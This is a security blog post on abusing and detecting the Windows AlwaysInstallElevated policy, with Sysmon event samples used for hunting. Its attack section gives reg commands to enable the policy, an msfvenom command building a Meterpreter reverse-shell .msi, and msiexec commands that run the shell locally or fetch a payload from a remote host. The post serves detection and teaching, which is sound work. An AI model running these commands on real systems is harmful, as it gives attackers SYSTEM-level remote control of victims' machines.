Detecting AlwaysInstallElevated Policy Abuse — Windows PrivEsc

Ankith Bharadwaj
5 min readApr 1, 2023

AlwaysInstallElevated is a group policy setting in Windows, which allows any user to install Windows Installer Packages (.msi files) with elevated (SYSTEM) privileges. The idea is to allow unprivileged users to install software with SYSTEM privileges.

This feature can be abused by threat actors for privilege escalation, by crafting & executing malicious .msi packages/payloads as SYSTEM.

Another advantage of this technique is the fact that .msi packages are executed by msiexec.exe —a digitally signed Microsoft binary (System Binary Proxy Execution: Msiexec), allowing attackers to proxy execute malicious code.

Enabling AlwaysInstallElevated Policy Setting

For demonstration purposes, we’ll use “Local Group Policy Editor” to manually enable this locally, as shown below. In an AD enterprise type environment, this setting could very well be implemented as a GPO for multiple users/hosts.

Computer Configuration > Administrative Templates > Windows Components> Windows Installer
User Configuration > Administrative Templates > Windows Components> Windows Installer

Since Group Policy settings are managed through Registry entries, an alternate method to perform the same operation is by adding the Installer subkey with the below “Name” and “Data” values, through “reg add” command:

C:\Users\ankit\Desktop>reg ADD HKLM\Software\Policies\Microsoft\Windows\
Installer /v AlwaysInstallElevated /d 1 /t REG_DWORD
The operation completed successfully.

C:\Users\ankit\Desktop>reg ADD HKCU\Software\Policies\Microsoft\Windows
\Installer /v AlwaysInstallElevated /d 1 /t REG_DWORD
The operation completed successfully.

The above changes can be verified using ”reg query” command:

C:\Users\ankith>reg query HKCU\SOFTWARE\Policies\Microsoft\Windows\Installer  
/v AlwaysInstallElevated

HKEY_CURRENT_USER\SOFTWARE\Policies\Microsoft\Windows\Installer
AlwaysInstallElevated REG_DWORD 0x1

C:\Users\ankith>reg query HKLM\SOFTWARE\Policies\Microsoft\Windows\Installer
/v AlwaysInstallElevated

HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\Installer
AlwaysInstallElevated REG_DWORD 0x1

Creating .msi Payload

An .msi reverse shell payload can be generated using Meterpreter’s msfvenom. It allows for setting payload format to .msi packages.

msfvenom -a x86 --platform windows -p windows/meterpreter/reverse_tcp 
LHOST=192.168.1.9 LPORT=443 -e x86/shikata_ga_nai -f msi -o payload.msi

Assuming initial access on the victim host, the payload is executed using msiexec:

C:\Users\ankit\Desktop\Payloads>msiexec /quiet /qn /i payload.msi

Checking privileges on our reverse shell, we see it running as SYSTEM:

msf6 exploit(multi/handler) > run

[*] Started reverse TCP handler on 192.168.1.9:443
[*] Sending stage (175174 bytes) to 192.168.1.5
[*] Sending stage (175174 bytes) to 192.168.1.7
[*] Meterpreter session 4 opened (192.168.1.9:443 -> 192.168.1.5:51698) at 2023-03-31 14:12:51 -0400
[*] Meterpreter session 5 opened (192.168.1.9:443 -> 192.168.1.7:1784) at 2023-03-31 14:12:51 -0400

meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM

Msiexec can also interact with remote web servers as typically indicated by the http:// or https:// in the file location portion of the command line. This allows adversaries to stage files on remote web servers, that can then be downloaded by msiexec:

C:\Users\ankith>msiexec /qn /i http://192.168.1.9:80/payload.msi

Detection & Hunting

We’ll use Sysmon logs to identify various criterias on which detections can be crafted. The first point applies specifically to the technique under discussion and the rest of them to msiexec detections in general:

1. Registry Events

Since the prerequisite for abuse is for the Installer registry key to be enabled with relevant Name/Data values, registry monitoring can help alert if this setting is added by admins or users in the future.

As a best practice effort, older events with these registry changes can be identified and remediated.

The below snippet shows Sysmon Event ID 13: RegistryEvent (Value Set).

Registry value set:
RuleName: AlwaysInstallElevated
EventType: SetValue
UtcTime: 2023-03-31 19:14:06.766
ProcessGuid: {ac6a4e42-30fe-6427-3d02-000000006500}
ProcessId: 4856
Image: C:\WINDOWS\system32\reg.exe
TargetObject: HKLM\SOFTWARE\Policies\Microsoft\Windows\Installer\AlwaysInstallElevated
Details: DWORD (0x00000001)

2. Network Connections

When msiexec is used to download remote payloads with the http:// or https:// file location, it will generate a Network Connection event as seen below. Since this behavior is uncommon, it might be worth hunting and reviewing for such msiexec remote downloads in general.

In general, this rules can be extended to similar network and proxy aware LOLBINs like resvr32.exe

Network connection detected:
RuleName: -
UtcTime: 2023-04-01 11:39:30.814
ProcessGuid: {ac6a4e42-171e-6428-b700-000000006600}
ProcessId: 8952
Image: C:\Windows\System32\msiexec.exe
User: NT AUTHORITY\SYSTEM
Protocol: tcp
Initiated: true
SourceIsIpv6: false
SourceIp: 192.168.1.7
SourceHostname: Sec504Student
SourcePort: 1600
SourcePortName: -
DestinationIsIpv6: false
DestinationIp: 192.168.1.9
DestinationHostname: -
DestinationPort: 80
DestinationPortName: http

On that same note, netflow/proxy logs can be used to alert on “Windows Installer” UserAgent.

3. Process Monitoring/Cmdline Arguments

Cmdline switches and keywords appearing in msiexec process executions can be monitored for potential suspicious activity.

  • /quiet — Specifies quiet mode
  • /qn — Specifies there’s no UI during the installation process.
  • http:// or https:// — Used to download and execute remote payload.
Process Create:
RuleName: -
UtcTime: 2023-04-01 13:13:54.707
ProcessGuid: {ac6a4e42-2e12-6428-7f01-000000006600}
ProcessId: 3100
Image: C:\Windows\System32\msiexec.exe
FileVersion: 5.0.17134.1 (WinBuild.160101.0800)
Description: Windows® installer
Product: Windows Installer - Unicode
Company: Microsoft Corporation
OriginalFileName: msiexec.exe
CommandLine: msiexec /qn /i http://192.168.1.9:80/payload.msi
CurrentDirectory: C:\Users\ankith\
User: <>
LogonGuid: {ac6a4e42-16d3-6428-11ce-030000000000}
LogonId: 0x3CE11
TerminalSessionId: 1
IntegrityLevel: Medium
Hashes: MD5=4767B71A318E201188A0D0A420C8B608,SHA256=F0B1D8B3ABCCFD6239521B8A114494B1AF0D4D3F89A75478E3535C18B100649D,IMPHASH=13C7ACE23F99CD5FBC3ABD5C16BF2DCE
ParentProcessGuid: {ac6a4e42-179b-6428-f500-000000006600}
ParentProcessId: 9004
ParentImage: C:\Windows\System32\cmd.exe
ParentCommandLine: "C:\WINDOWS\system32\cmd.exe"

References

--

--